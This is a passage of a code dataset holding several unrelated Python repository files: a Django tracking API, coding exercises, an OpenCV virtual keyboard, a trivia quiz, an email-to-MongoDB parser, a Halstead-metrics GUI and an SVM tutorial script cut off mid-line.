get_weather_news_hotels(cities):\n try:\n data_list = []\n for city in cities:\n # Weather\n data_dict = {\"weather\": TrackingService.get_aggregated_weather(city)}\n\n # City Hotels\n if TrackingService.get_aggregated_hotels(city):\n data_dict = {\"hotels\": TrackingService.get_aggregated_hotels(city)}\n\n # News\n data_dict[\"News\"] = TrackingService.get_aggregated_news(city)\n data_list.append(data_dict)\n return data_list\n except Exception as ex:\n raise ValueError(f\"Unable to fetch data\")\n\n @staticmethod\n def create_many_marks(track_id, marks_list):\n track = Tracks.objects.get(id=track_id)\n for mark in marks_list:\n mark_obj = Mark.objects.create(track=track, location=mark)\n mark_obj.save()\n\n @staticmethod\n def get_serializer():\n return TrackingSerializer\n\n def post(self, request):\n try:\n print(\"sdsh\")\n print(request.data)\n marks = request.data.pop(\"marks\")\n request.data[\"id\"] = uuid.uuid4()\n serializer = self.get_serializer()\n serializer = serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n city_list = [serializer.validated_data['origin_location'], *marks,\n serializer.validated_data['destination_location']]\n cities_data = self.get_weather_news_hotels(city_list)\n self.create_many_marks(serializer.validated_data[\"id\"], marks)\n\n return success_response(status=status.HTTP_200_OK, data=cities_data)\n except Exception as ex:\n raise ex\n\n def get(self, request):\n try:\n tracks = Tracks.objects.all()\n serializer = self.get_serializer()\n serializer = serializer(tracks, many=Tracks)\n return success_response(status=status.HTTP_200_OK, data=serializer.data)\n except Exception as ex:\n raise ex\n\n\nclass FeedbackAPIView(APIView):\n authentication_classes = [JWTAuthentication]\n permission_classes = [IsAuthenticated]\n\n @staticmethod\n def get_serializer():\n return UserFeedbackSerializer\n\n def post(self, request):\n try:\n request.data[\"user_id\"] = request.user.user_id\n serializer = self.get_serializer()\n serializer = serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n send_email(to=\"mustafamunir10@gmail.com\", subject=\"User Feedback\",\n body=serializer.validated_data[\"feedback\"])\n return success_response(status=status.HTTP_200_OK, data=serializer.validated_data)\n except Exception as ex:\n raise ex\n","repo_name":"MustafaMunir123/xenomorph-api","sub_path":"xenomorph_api/apps/tracking/api/v1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38545301295","text":"\"\"\"\nIt's New Year's Day and everyone's in line for the Wonderland rollercoaster ride! \nThere are a number of people queued up, and each person wears a sticker\nindicating their initial position in the queue. \nInitial positions increment by 1 from 1 at the front of the line to n at the back.\n\nAny person in the queue can bribe the person directly in front of them to swap positions. If two people swap positions, they still wear the same sticker\ndenoting their original places in line. One person can bribe at most two others. For example, if n==8 and Person 5 bribes Person 4 , the queue will look like this: \n[1,2,3,5,4,6,7,8]\n\nFascinated by this chaotic queue, you decide you must know the minimum number of bribes that took place to get the queue into its current state!\n\nFunction Description\n\nComplete the function minimumBribes in the editor below. It must print an integer representing the minimum number of bribes necessary, or Too chaotic if the line configuration is not possible.\n\"\"\"\n\n# INPUT: A queue representing state after bribes in original queue\n# OUTPUT: Minimum number of bribes to produce queue or \"Too Chaotic\"\n\n# Complete the minimumBribes function below.\n\n\ndef minimumBribes(q):\n expected = 1\n one_bribe = 2\n two_bribes = 3\n bribes = 0\n for i in range(len(q)):\n if q[i] == expected:\n expected = one_bribe\n one_bribe = two_bribes\n two_bribes += 1\n elif q[i] == one_bribe:\n bribes += 1\n one_bribe = two_bribes\n two_bribes += 1\n elif q[i] == two_bribes:\n bribes += 2\n two_bribes += 1\n else:\n return \"Too Chaotic\"\n return bribes","repo_name":"MichaelKim39/interview-questions","sub_path":"wordy/minimum-bribes.py","file_name":"minimum-bribes.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27873519669","text":"'''\nAI Virtual Keyboard using OpenCV with two fingers\nhttps://www.youtube.com/watch?v=jzXZVFqEE2I&t=26s\nhttps://www.computervision.zone/lessons/code-files-18/\nhttps://google.github.io/mediapipe/solutions/solutions.html\nhttps://google.github.io/mediapipe/solutions/hands.html\n42:00\n'''\n\nimport cv2\nfrom cvzone.HandTrackingModule import HandDetector\nfrom time import sleep\nimport numpy as np\nimport cvzone\n\n\n# c:\\users\\rockman\\appdata\\local\\programs\\python\\python310\\lib\\site-packages\\pynput-1.7.6.dist-info\\*\n\n\ncap = cv2.VideoCapture(0)\ncap.set(3, 1280)\ncap.set(4, 720)\n\ndetector = HandDetector(detectionCon=0.8)\nkeys = [[\"Q\", \"W\", \"E\", \"R\", \"T\", \"Y\", \"U\", \"I\", \"O\", \"P\"],\n [\"A\", \"S\", \"D\", \"F\", \"G\", \"H\", \"J\", \"K\", \"L\", \";\"],\n [\"Z\", \"X\", \"C\", \"V\", \"B\", \"N\", \"M\", \",\", \".\", \"/\"],\n [\"ctr\", \"X\", \"C\", \"V\", \"spc\", \"N\", \"M\", \",\", \".\", \"/\"]\n ]\nfinalText = \"\"\n\n\n\n\ndef drawAll(img, buttonList):\n for button in buttonList: # Scan all the button in the keyboard\n x, y = button.pos\n w, h = button.size\n cvzone.cornerRect(img, (button.pos[0], button.pos[1], button.size[0], button.size[1]),\n 20, rt=0)\n cv2.rectangle(img, button.pos, (x + w, y + h), (255, 0, 255), cv2.FILLED)\n cv2.putText(img, button.text, (x + 20, y + 65),\n cv2.FONT_HERSHEY_PLAIN, 4, (255, 255, 255), 4)\n return img\n\n\nclass Button():\n def __init__(self, pos, text, size=[85, 85]):\n self.pos = pos # [ i,j ]\n self.size = size # [width ,height]\n self.text = text\n\n\nbuttonList = []\nfor i in range(len(keys)):\n for j, key in enumerate(keys[i]): # Scan one line in 'keys[[]]'\n buttonList.append(Button([100 * j + 50, 100 * i + 50], key))\n\n###################################\n\n\nwhile True:\n\n success, img = cap.read()\n img = cv2.flip(img, 1)\n hands, img = detector.findHands(img, flipType=False)\n\n if hands:\n # Hand 1\n hand1 = hands[0]\n lmList1 = hand1[\"lmList\"] # List of 21 Landmarks points\n #bbox1 = hand1[\"bbox\"] # Bounding Box info x,y,w,h\n #centerPoint1 = hand1[\"center\"] # center of the hand cx,cy\n #handType1 = hand1[\"type\"] # Hand Type Left or Right\n\n img = drawAll(img, buttonList)\n\n if lmList1: # If we can see a hand\n for button in buttonList: # Loop all the buttons\n x, y = button.pos\n w, h = button.size\n # Change background color of the specific button\n\n lmx, lmy, _ = (hand1[\"lmList\"][8])\n lm8 = (lmx, lmy)\n\n if ( x < lmx < x + w and y < lmy < y + h ):\n cv2.rectangle(img, (x - 5, y - 5), (x + w + 5, y + h + 5), (175, 0, 175), cv2.FILLED)\n cv2.putText(img, button.text, (x + 20, y + 65),\n cv2.FONT_HERSHEY_PLAIN, 4, (255, 255, 255), 4)\n\n\n lmx, lmy, _ = (hand1[\"lmList\"][12])\n lm12 = (lmx, lmy)\n\n print(lm8,' ',button.text)\n l, _, _ = detector.findDistance(lm8, lm12, img) # , draw=False)\n\n\n # If clicked (distance between two fingers is smaller )\n if l < 80:\n\n cv2.rectangle(img, button.pos, (x + w, y + h), (0, 255, 0), cv2.FILLED)\n cv2.putText(img, button.text, (x + 20, y + 65),\n cv2.FONT_HERSHEY_PLAIN, 4, (255, 255, 255), 4)\n finalText += button.text\n sleep(0.45)\n y1 = 550\n y2 = y1 + 60\n y3 = y1 + 52\n cv2.rectangle(img, (50, y1), (700, y2), (175, 0, 175), cv2.FILLED)\n cv2.putText(img, finalText, (60, y3),\n cv2.FONT_HERSHEY_PLAIN, 5, (255, 255, 255), 5)\n\n cv2.imshow(\"Image\", img)\n if cv2.waitKey(20) & 0xFF == ord('q'):\n break\n","repo_name":"danizalm05/python01","sub_path":"opencv/murtazaNew/AI Virtual Keyboard/vrtKeybord00.py","file_name":"vrtKeybord00.py","file_ext":"py","file_size_in_byte":3920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28344971753","text":"\r\nimport sys\r\nimport html\r\nfrom enum import Enum\r\nimport requests\r\nfrom fake_headers import Headers\r\n\r\nh = Headers()\r\n\r\nclass Options(Enum):\r\n true_ = 'T'\r\n false_ = 'F'\r\n\r\nclass OptionsABC(Enum):\r\n A = 'A'\r\n B = 'B'\r\n C = 'C'\r\n D = 'D'\r\n\r\nclass Category(Enum):\r\n gen = 'gen'\r\n sports = 'sports'\r\n computing = 'computing'\r\n politics = 'politics'\r\n art = 'art'\r\n history = 'history'\r\n geography = 'geography'\r\n celebrities = 'celebrities'\r\n animals = 'animals'\r\n anime = 'anime'\r\n nature='nature'\r\n books = 'books'\r\n math = 'math'\r\n\r\n\r\nclass Difficulty(Enum):\r\n easy = 'easy'\r\n medium = 'medium'\r\n hard = 'hard'\r\n any1 = 'any' \r\n\r\nclass Questions:\r\n # TOTAL = 10\r\n score = 0\r\n CATS = { 'gen':9, 'books':10, 'nature':17, 'computing':18, 'math':19, 'sports':21,'geography':22, 'history':23, \r\n 'politics':24, 'art':25, 'celebrities':26, 'animals':27, 'anime':32 }\r\n\r\n def __init__(self,cat,level,total):\r\n self.TOTAL = total\r\n self.cat_selected = self.CATS[cat.value]\r\n if level.value == 'any':\r\n url = f'https://opentdb.com/api.php?amount={self.TOTAL}&category={self.cat_selected}&type=multiple'\r\n else: \r\n url = f'https://opentdb.com/api.php?amount={self.TOTAL}&category={self.cat_selected}&difficulty={level.value}&type=multiple'\r\n\r\n print(f\"\\nCATEGORY: {cat.value}, DIFFICULTY: {level.value}\")\r\n self.r = requests.get(url, headers=h.generate())\r\n self.question_bank_ABC = []\r\n \r\n for item in self.r.json()['results']:\r\n opts = [html.unescape(i) for i in item['incorrect_answers']]\r\n opts.append(html.unescape(item['correct_answer']))\r\n\r\n self.question_bank_ABC.append({'Q': html.unescape(item['question']), 'A': html.unescape(item['correct_answer']),\r\n 'WA': [html.unescape(k) for k in item['incorrect_answers']],\r\n 'Options': sorted(opts)})\r\n\r\n self.level = level\r\n self.get_questions(self.level)\r\n\r\n def get_questions(self, level):\r\n url = f'https://opentdb.com/api.php?amount={self.TOTAL}&category={self.cat_selected}&difficulty={level.value}&type=boolean'\r\n self.r2 = requests.get(url, headers=h.generate())\r\n self.question_bank = [{'Q': html.unescape(i['question']), 'A':html.unescape(\r\n i['correct_answer'])} for i in self.r2.json()['results']]\r\n\r\n def quizer_tf(self):\r\n '''True/False quiz brain '''\r\n if len(self.r2.json()['results']) > 0:\r\n for num, item in enumerate(self.question_bank):\r\n print(\r\n f\"\\n{num+1}. {item['Q']} \\n(True or False. Enter T or F)\")\r\n print('-------------------------------------------')\r\n user_answer = input('\\nEnter your option: ').upper()\r\n while user_answer not in [i.value for i in Options]:\r\n print('\\n **** Invalid Input. *** \\nPlease Enter T or F')\r\n user_answer = input('Enter your option: ').upper()\r\n if user_answer == item['A'][0].upper():\r\n self.score += 1\r\n print(\r\n f'Correct. \\nCurrent Score:\\t{self.score}/{self.TOTAL}\\n')\r\n print('---------------------------------------')\r\n else:\r\n print('---------------------------------------')\r\n print(f\"**** Oops, wrong answer. \\n\")\r\n\r\n print('\\n****************************')\r\n print(f'\\nFinal Score:\\t{self.score}/{self.TOTAL}')\r\n print('\\n****************************')\r\n else:\r\n print('Not available. Try another option')\r\n sys.exit()\r\n\r\n def quizer_mcq(self):\r\n '''multiple choice quiz brain '''\r\n if len(self.r.json()['results']) > 0:\r\n for num, item in enumerate(self.question_bank_ABC):\r\n print(f\"\\n\\n{num+1}. {item['Q']}\")\r\n print('-------------------------------------------')\r\n show_options = {'A': item['Options'][0], 'B': item['Options'][1],\r\n 'C': item['Options'][2], 'D': item['Options'][3]}\r\n [print(f\"{k}. {v}\", sep='\\n') for k, v in show_options.items()]\r\n user_answer = input(\r\n '\\nEnter your option (A, B, C, or D): ').upper()\r\n while user_answer not in [i.value for i in OptionsABC]:\r\n print('\\n **** Invalid Input. *** \\nPlease Enter A, B, C, or D')\r\n user_answer = input('Enter your option: ').upper()\r\n\r\n if show_options[user_answer] == item['A']:\r\n self.score += 1\r\n print(\r\n f'Correct. \\nCurrent Score:\\t{self.score}/{self.TOTAL}\\n')\r\n print('---------------------------------------')\r\n else:\r\n print('---------------------------------------')\r\n print(\r\n f\"**** Oops, wrong answer. \\n The Correct answer is: {item['A']}\")\r\n\r\n print('\\n****************************')\r\n print(f'\\nFinal Score:\\t{self.score}/{self.TOTAL}')\r\n print('\\n****************************')\r\n else:\r\n print('Not available. Try another option')\r\n sys.exit()\r\n","repo_name":"ubongab/quiz-cli","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":5487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"474602768","text":"\"\"\"利用二分法查找有序列表\"\"\"\r\n\r\ndef two_find(list, index):\r\n list.sort()\r\n min = 0 # 设置最小下限\r\n maxl = len(list) # 设置最大上限\r\n if index in list:\r\n while True:\r\n midl = (min + maxl) // 2 # 分段\r\n if list[midl] > index: # index在list左侧\r\n maxl = midl\r\n elif list[midl] < index: # index在list右侧\r\n min = midl\r\n elif list[midl] == index:\r\n print(\"{} 在 {} 中的下标是 {}\".format(index, list, midl))\r\n break\r\n else:\r\n print(\"没有该数字\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n arr = [1, 6, 7, 9, 12, 43, 13, 54, 65, 43, 23, 22, 15, 0, 100]\r\n while True:\r\n num = input(\"请输入一个整数: \")\r\n if num == 'exit' or num == '':\r\n print('退出...')\r\n break\r\n try:\r\n k = int(num)\r\n two_find(arr, k)\r\n except Exception as e:\r\n print(e)\r\n\r\n","repo_name":"zcguderian/-","sub_path":"two_find(利用二分法查找列表值).py","file_name":"two_find(利用二分法查找列表值).py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16407677114","text":"#!/usr/bin/env python\nimport sys\nimport re\nimport hashlib\nfrom pymongo import MongoClient\nimport bson\n\nclient = MongoClient()\ndb = client.blackmailedDB\nmainCollection = db.mainCollection\n\nfile_name = sys.argv[1]\nemails_raw = open(file_name, \"r\")\nemail_temp = ''\nreceived_count = 1\n\n\ndef hash_check(hash_sha1):\n\n if db.mainCollection.find().count() > 0:\n if not db.mainCollection.find({'email_hash': hash_sha1}).count() == 0:\n hashResult = True\n else:\n hashResult = False\n else:\n hashResult = False\n return(hashResult)\n\n\ndef unicode_detect(test_value):\n try:\n #This code could deal with other encodings, like latin_1\n #but that's not the point here\n test_value.decode('utf-8')\n\n except UnicodeDecodeError:\n test_value = bson.binary.Binary(str(test_value))\n\n return(test_value)\n\nx = 0\n\nfor line in emails_raw:\n temp_line = line.replace('\\r\\n', '\\n') # convert to standard Unix return values\n email_temp += temp_line\n\n if re.match(r'\\.\\n', temp_line): # find end of email\n\n messageSHA1 = hashlib.sha1(email_temp).hexdigest()\n\n boolValue = hash_check(messageSHA1)\n\n if boolValue is True:\n #print('--------------------------------ALREADY HERE---------------------------------------')\n email_temp = '' # Cleared to prepare for next email\n\n else:\n #print('-----------------------------NEW EMAIL INSERTED------------------------------------')\n email_split = email_temp.split('\\n\\n', 1)\n header_temp = email_split[0]\n body_temp = email_split[1]\n email_temp = '' # Cleared to prepare for next email\n header_list = header_temp.split('\\n')\n email_dict = {}\n email_dict['email_hash'] = messageSHA1\n email_dict['email_body'] = {}\n email_dict['email_header'] = {}\n header_temp = [] # reuse the header_temp\n\n # Processing the headers into a dictionary\n for x in range(len(header_list)):\n if re.match(r'(.*):', header_list[x]) and not re.match(r'\\t|\\s(.*)', header_list[x]): # find email header categories\n header_temp.append(header_list[x])\n elif re.match(r'\\t|\\s(.*)', header_list[x]): # find email headers with \\t or ' ' beginning\n header_temp[len(header_temp) - 1] += header_list[x]\n else:\n header_temp.append(header_list[x] + ': NONE')\n\n for y in range(len(header_temp)):\n header_list = header_temp[y].split(':', 1)\n header_list[0] = unicode_detect(header_list[0])\n header_list[0] = re.sub('\\.', '_-_', header_list[0])\n if header_list[0] == 'Received':\n header_list[0] = 'Received_' + str(received_count)\n received_count += 1\n email_dict['email_header'][header_list[0]] = unicode_detect(header_list[1].lstrip())\n body_temp = unicode_detect(body_temp)\n email_dict['email_body']['body'] = body_temp\n mainCollection.insert(email_dict)\n received_count = 1\n\nemails_raw.close()\n\n","repo_name":"iv0ryw0lf/bmpublic","sub_path":"bmparser.py","file_name":"bmparser.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22079477555","text":"import tkinter\nimport sourses\nimport math\nfrom tkinter import *\nfrom tkinter import scrolledtext, filedialog, messagebox\n\nfrom createTable import createTable\nfrom ourclass import RecordOperators\nfrom workWithOperators import findingOperators, findDot, deleteRepeatObj, editFunc\n\n\ndef delitingMultiComments(redString):\n i = 0\n while i < len(redString):\n if redString[i] == \"/**\" or redString[i] == \"*\" or redString[i] == \"*/\" or redString[i] == \"/*\":\n retStr = \" \"\n return retStr\n else:\n i += 1\n return redString\n\n\ndef delitingMultigovno(redString):\n i = 0\n while i < len(redString):\n if redString[i] == \"/*\":\n return 1\n else:\n i += 1\n return 0\n\n\n# удаляю строки с импортами и пэкеджами\ndef delitingOfImport(redString):\n i = 0\n while i < len(redString):\n if redString[i] == \"import\" or redString[i] == \"package\" or redString[i] == \"//\" or redString[i] == \"class\" or redString[i] == \"static\":\n returnString = ' '\n return returnString\n i += 1\n return redString\n\n\ndef returningOfnames(redString):\n i = 0\n newLine = \" \"\n while i < len(redString):\n if redString[i] == \"$\" and len(redString[i + 1]) <= len(redString) and redString[i + 1] == \"{\":\n end = redString.find(\"}\")\n j = i\n while j <= end:\n newLine += redString[j]\n j += 1\n return newLine\n else:\n i += 1\n redString = \" \"\n return redString\n\n\n# удаляю всякие распечатки строк\ndef delitingOfStrings(redString):\n finding = '\"'\n newLine = \" \"\n if redString.find(finding) != -1:\n start = redString.find(finding)\n ending = redString.rfind(finding)\n i = 0\n while i <= start:\n newLine += redString[i]\n i += 1\n i = ending\n while i < len(redString):\n newLine += redString[i]\n i += 1\n\n smLine = \" \"\n i = start + 1\n while i < ending:\n smLine += redString[i]\n i += 1\n workString = returningOfnames(redString)\n newLine = newLine + \" \" + workString\n else:\n newLine = redString\n return newLine\n\n\n# создание листа с операторами и их подсчётом\ndef editingOperatorsList(listOfOperators):\n i = 0\n h = 0\n length = len(listOfOperators)\n while i < length:\n j = i + 1\n while j < length:\n if listOfOperators[i].name == listOfOperators[j].name:\n listOfOperators[i].amount = listOfOperators[i].amount + listOfOperators[j].amount\n del listOfOperators[j]\n h += 1\n length = len(listOfOperators)\n else:\n j += 1\n i += 1\n i = 0\n while i < len(listOfOperators):\n if listOfOperators[i].name == 'if':\n j = 0\n while j < len(listOfOperators):\n if listOfOperators[j].name == 'else':\n if listOfOperators[i].amount > listOfOperators[j].amount:\n listOfOperators[j].name = listOfOperators[i].name + '..' + listOfOperators[j].name\n listOfOperators[i].amount = listOfOperators[i].amount - listOfOperators[j].amount\n else:\n listOfOperators[i].name = listOfOperators[i].name + '..' + listOfOperators[j].name\n del listOfOperators[j]\n break\n else:\n j += 1\n elif listOfOperators[i].name == 'try':\n j = 0\n while j < len(listOfOperators):\n if listOfOperators[j].name == 'catch':\n if listOfOperators[i].amount > listOfOperators[j].amount:\n listOfOperators[j].name = listOfOperators[i].name + '..' + listOfOperators[j].name\n listOfOperators[i].amount = listOfOperators[i].amount - listOfOperators[j].amount\n else:\n listOfOperators[i].name = listOfOperators[i].name + '..' + listOfOperators[j].name\n del listOfOperators[j]\n j = 0\n while j < len(listOfOperators):\n if listOfOperators[j].name == 'finally':\n if listOfOperators[i].amount > listOfOperators[j].amount:\n listOfOperators[j].name = listOfOperators[i].name + '..' + listOfOperators[j].name\n listOfOperators[i].amount = listOfOperators[i].amount - listOfOperators[j].amount\n else:\n listOfOperators[i].name = listOfOperators[i].name + '..' + listOfOperators[j].name\n del listOfOperators[j]\n elif listOfOperators[j].name == 'finally':\n if listOfOperators[i].amount > listOfOperators[j].amount:\n listOfOperators[j].name = listOfOperators[i].name + '..' + listOfOperators[j].name\n listOfOperators[i].amount = listOfOperators[i].amount - listOfOperators[j].amount\n else:\n listOfOperators[i].name = listOfOperators[i].name + '..' + listOfOperators[j].name\n del listOfOperators[j]\n else:\n j += 1\n i += 1\n return listOfOperators\n\n\n# delete oop words\ndef delitingOfOOP(redString):\n i = 0\n while i < len(redString):\n if sourses.oop_delete.get(redString[i], 0) != 0:\n del redString[i]\n else:\n i += 1\n return redString\n\n\n# set the value of checkbox and set te visibiality of button to open file\ndef setChoose():\n var.set(not var.get())\n if var.get():\n openFileBtn.pack_forget()\n chooseInputType.deselect()\n else:\n chooseInputType.select()\n openFileBtn.pack()\n\n\ndef editFuncList(operators, operands, func):\n i = 0\n while i < len(func):\n j = 0\n while j < len(operands):\n if operands[j].name == func[i].name:\n funcOpr = RecordOperators(func[i].name, 1)\n operators.append(funcOpr)\n operators.extend(func[i].operators)\n operands.extend(func[i].operands)\n del operands[j]\n else:\n j += 1\n i += 1\n return operators, operands\n\n\n# show result table\ndef showTable():\n if inputText.get('0.1') == '\\n':\n messagebox.showerror('Error', 'Please, choose your file or inter your text')\n else:\n list1, list2, list3 = readFromTextbox()\n list2 = deleteRepeatObj(list2)\n list1, list2 = editFuncList(list1, list2, list3)\n list2 = deleteRepeatObj(list2)\n list1 = editingOperatorsList(list1)\n # считаю метрики\n programmDictionary = len(list1) + len(list2)\n programmLength = 0\n i = 0\n while i < len(list1):\n programmLength += list1[i].amount\n i += 1\n i = 0\n while i < len(list2):\n programmLength += list2[i].initialization + list2[i].usability\n i += 1\n\n programPower = programmLength * math.log2(programmDictionary)\n createTable(list1, list2, str(int(programPower)))\n\n\ndef convert(list):\n # Converting integer list to string list\n i = 0\n res = ''\n while i < len(list):\n res = res + ' ' + list[i]\n i += 1\n return (res)\n\n\ndef readFromTextbox():\n resultListOfOperators = []\n resultOfOperands = []\n funcList = []\n text = inputText.get('1.0', END).splitlines()\n i = 0\n while i < len(text):\n line = text[i]\n if line != '':\n line = text[i].split()\n str = text[i]\n if line[0] == 'def':\n ind1 = ind2 = 0\n funcStr = ''\n while ind1 != ind2 or ind1 == ind2 == 0:\n j = 0\n line = text[i].split()\n while j < len(line):\n if line[j] == '{':\n ind1 += 1\n elif line[j] == '}':\n ind2 += 1\n j += 1\n delStringLine = delitingOfStrings(text[i])\n anotherDel = delitingMultiComments(delStringLine.split())\n lineWithDot = convert(delitingOfOOP(anotherDel))\n funcStr = funcStr + ' ' + lineWithDot\n i += 1\n funcList.append(editFunc(funcStr.split()))\n else:\n delStringLine = delitingOfStrings(str)\n anotherDel = delitingMultiComments(delStringLine.split())\n if anotherDel != \" \":\n lineWithoutImport = delitingOfImport(anotherDel)\n if lineWithoutImport != \" \":\n lineWithDot = delitingOfOOP(lineWithoutImport)\n operators, operands = findingOperators(findDot(lineWithDot))\n resultListOfOperators.extend(operators)\n resultOfOperands.extend(operands)\n i += 1\n else:\n i += 1\n finalOperatorsList = editingOperatorsList(resultListOfOperators)\n return finalOperatorsList, resultOfOperands, funcList\n\n\n# open dialog to find file and after that define variable fileName as path of the file\n# read from file by lines and write into text area in the main form\ndef openFile():\n fileName = filedialog.askopenfilename(filetypes=((\"TXT files\", \"*.txt\"),))\n inputText.delete('1.0', END)\n name = fileName\n try:\n f = open(name, 'r')\n numOfLine = 0\n for line in f:\n if numOfLine == 0:\n line = line[1:]\n line = line[:0] + ' ' + line[2:]\n inputText.insert(END, line)\n numOfLine = numOfLine + 1\n except (OSError, IOError) as e:\n messagebox.showerror('Error', 'Please, choose your file or inter your text')\n\n\n# addition of the all components in the main form and set their size\n\nwindow = tkinter.Tk()\nwindow.title(\"Hasltead's metrics\")\nwindow.geometry(\"1000x550\")\nvar = BooleanVar()\nvar.set(0)\nf_top = Frame(window)\nf_bot = Frame(window)\ntextForInput = Label(f_top, width=20, height=2, text=\"Please, enter yor program\")\nopenFileBtn = Button(f_bot, width=20, height=2, text=\"Open File\", command=openFile)\nchooseInputType = Checkbutton(f_top, width=20, height=2, text=\"Read from file\", variable=var, command=setChoose)\ninputText = scrolledtext.ScrolledText(f_bot, width=700, height=25)\ninputText.configure(font=\"Calibri 10\")\nanalyseBtn = Button(f_bot, width=20, height=2, text=\"Analyse\", command=showTable)\n\nf_top.pack()\nf_bot.pack()\n\ntextForInput.pack(side=LEFT)\nchooseInputType.pack()\ninputText.pack(side=TOP, padx=10, pady=10)\nanalyseBtn.pack(side=BOTTOM, padx=10, pady=10)\n\nwindow.mainloop()\n","repo_name":"MarySoroka/Halstead-mentrics","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13660686872","text":"# -*- coding: utf-8 -*-\r\n\r\n#%%\r\n#==========================\r\n# SUPPORT VECTOR MACHINES #\r\n#==========================\r\n\r\nimport seaborn as sns\r\nsns.set()\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom sklearn import svm\r\n\r\n#%%\r\n#========================\r\n# HARD MARGIN CLASSIFIER\r\n#========================\r\n\r\nfrom sklearn.datasets import make_blobs\r\n\r\nX, y = make_blobs(centers=[[1, 1], [-1, -1]], cluster_std=0.4, random_state=0)\r\nx = np.linspace(-2, 2, 100)\r\n\r\nplt.scatter(X[:, 0], X[:, 1], c=y, cmap=plt.cm.bwr)\r\nplt.plot(x, -x+0.25, '--k')\r\nplt.plot(x, -0.25*x-0.3, 'r--')\r\nplt.plot(x, -1.5*x+1, 'b--')\r\nplt.xlim([-2, 2])\r\nplt.ylim([-2, 2])\r\nplt.xlabel('$x_1$')\r\nplt.ylabel('$x_2$');\r\n\r\n#%%\r\n#================================\r\n# DETERMINING THE MAXIMUM MARGIN\r\n#================================\r\n\r\nfrom ipywidgets import interact, IntSlider, FloatSlider, fixed\r\nfrom sklearn import svm\r\n\r\ndef plot_svc_interact(X, y):\r\n def plotter(log_C=1):\r\n clf = svm.SVC(C=10**log_C, kernel='linear')\r\n clf.fit(X, y)\r\n \r\n beta = clf.coef_[0]\r\n beta_0 = clf.intercept_\r\n slope = -beta[0]/beta[1]\r\n intercept = -beta_0/beta[1]\r\n \r\n x_max = np.ceil(np.abs(X).max())\r\n x = np.linspace(-x_max, x_max, 100)\r\n margin_bound_1 = 1/beta[1] + slope*x + intercept\r\n margin_bound_2 = -1/beta[1] + slope*x + intercept\r\n\r\n plt.plot(x, slope*x + intercept, 'k')\r\n plt.fill_between(x, margin_bound_1, margin_bound_2, color='k', alpha=0.25, linewidth=0)\r\n plt.scatter(*clf.support_vectors_.T, s=100, c='y')\r\n plt.scatter(X[:, 0], X[:, 1], c=y, cmap=plt.cm.bwr)\r\n plt.axis([-x_max, x_max, -x_max, x_max])\r\n\r\n return plotter\r\n\r\nplot_svc_interact(X, y)(log_C=2)\r\n\r\n#%%\r\n#========================\r\n# SOFT MARGIN CLASSIFIER\r\n#========================\r\n\r\n\r\nx = np.linspace(-1, 2, 100)\r\nhinge_loss = lambda x: -(x-1) if x-1 < 0 else 0\r\n\r\nplt.plot(x, list(map(hinge_loss, x)))\r\nplt.xlabel(\"$y(x\\cdot\\\\beta + \\\\beta_0$)\")\r\nplt.ylabel('loss');\r\n\r\n#%%\r\n# Training the soft margin classifier on a data set that is not completely linear separable\r\n\r\nfrom sklearn.datasets import make_blobs\r\n\r\nX, y = make_blobs(centers=[[1, 1], [-1, -1]], cluster_std=1.5, random_state=0, n_samples=200)\r\n\r\nlog_C_slider = FloatSlider(min=-4, max=2, step=0.25, value=0, description='$\\log(C)$')\r\ninteract(plot_svc_interact(X, y), log_C=log_C_slider);\r\n\r\n#%%\r\n#======================================\r\n# KERNELS FOR NONLINEAR CLASSIFICATION\r\n#======================================\r\n\r\nfrom sklearn.datasets import make_circles\r\n\r\nX, y = make_circles(n_samples=200, noise=0.2, factor=0.25, random_state=0)\r\nplt.scatter(*X.T, c=y, cmap=plt.cm.bwr)\r\nplt.xlabel('$x_1$')\r\nplt.ylabel('$x_2$');\r\n\r\n#%%\r\n# we can create a new feature, ð�‘¥3, the distance from the origin.\r\n# With the new feature, we are projecting our data onto a higher dimensional space.\r\n# \r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\ndef plot_projection(X, y):\r\n XX, YY = np.meshgrid(np.linspace(-1, 1, 20), np.linspace(-1, 1, 20))\r\n ZZ = 0.6*np.ones((20, 20))\r\n x_3 = (X[:, 0]**2 + X[:, 1]**2)**0.5\r\n X_new = np.hstack((X, x_3.reshape(-1, 1)))\r\n\r\n def plotter(elev=30, azim=30):\r\n fig = plt.figure()\r\n ax = plt.axes(projection='3d')\r\n ax.scatter(*X_new.T, c=y, cmap=plt.cm.bwr)\r\n ax.plot_surface(XX, YY, ZZ, alpha=0.2);\r\n ax.view_init(elev, azim)\r\n ax.set_xlabel('$x_1$')\r\n ax.set_ylabel('$x_2$')\r\n ax.set_zlabel('$x_3$')\r\n\r\n return plotter\r\n\r\ninteract(plot_projection(X, y), elev=(0, 360), azim=(0, 360));\r\n\r\n#%%\r\n#====================\r\n# CHOICES OF KERNELS\r\n#====================\r\n\r\ndef plot_decision_boundary(X_train, X_test, y_train, y_test):\r\n def plotter(kernel='linear', log_gamma=1, log_C=1, deg=1, coef0=1):\r\n clf = svm.SVC(C=10**log_C, kernel=kernel, gamma=10**log_gamma, coef0=coef0, probability=True)\r\n clf.fit(X_train, y_train)\r\n \r\n X1, X2 = np.meshgrid(np.linspace(-2, 3), 